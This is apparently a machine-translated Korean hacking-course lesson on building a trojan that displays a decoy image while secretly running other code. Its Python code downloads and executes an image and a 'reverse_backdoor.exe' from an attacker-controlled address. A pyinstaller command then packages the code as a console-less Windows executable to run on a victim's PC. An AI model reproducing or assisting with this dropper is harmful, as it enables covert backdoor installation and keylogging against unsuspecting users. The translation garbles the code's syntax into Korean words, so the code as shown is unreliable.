21 트로이 목마
트로이 목마는 외모와 파일 일반 파일 (이미지, PDF, 노래 .. 등)와 같은 기능을합니다.
때 실행은 :
1. 엽니 사용자가 기대하는 정상 파일을.
2. 실행 백그라운드에서 사악한 코드 (백도어 / 키로거 .. 등을 실행).
다운로드 및 페이로드를 실행
- & 다운로드 일반적인 실행 파일을 실행합니다.
- 아이디어 :
- 백도어 + 키로거를 다운로드합니다.
- 다운로드 키로거 + 비밀 번호 복구 도구.
- 키로거 + 암호 복구 도구 + 백도어를 다운로드합니다.
- 악 파일 + 일반 파일 - 트로이 목마로 사용합니다.
download_and_exeucte 파이썬 코드를 만듭니다 :
# !는 / usr / ENV / 빈 파이썬 수입 OS의 수입 서브 프로세스의 수입 요청을 가져 임시 파일을 데프 다운로드 (URL) : get_response = requests.get (URL) FILE_NAME = url.split ( " / " ) - 1 ] 개방과 (FILE_NAME, " WB " ) out_file로 쓰기로 : out_file.write (get_response.content) temp_directory = tempfile.gettempdir () os.chdir (temp_directory) 인쇄 (temp_directory) 다운로드 ( " http://10.0.0.43/evil-files/Galaxy.jpg " ) subprocess.Popen ( " Galaxy.jpg " , 쉘 = 참) 다운로드 ( " http://10.0.0.43/evil-files/reverse_backdoor.exe " ) subprocess.call ( " reverse_backdoor.exe " , 쉘 = 참) os.remove ( " Galaxy.jpg " ) os.remove ( " reverse_backdoor.exe " )
윈도우 실행에 파이썬 프로그램을 변환합니다.
와인 /root/.wine/drive_c/Program \ 파일 \ \ (86 \) / Python37- 32 /Scripts/pyinstaller.exe download_and_execute.py --onefile --noconsole
vitim의 PC에 download_and_execute.exe 파일을 실행합니다.
사용자는 단지 통상의 사진을 볼 수 있지만, 상기 통신이 배경을 확립하고있다.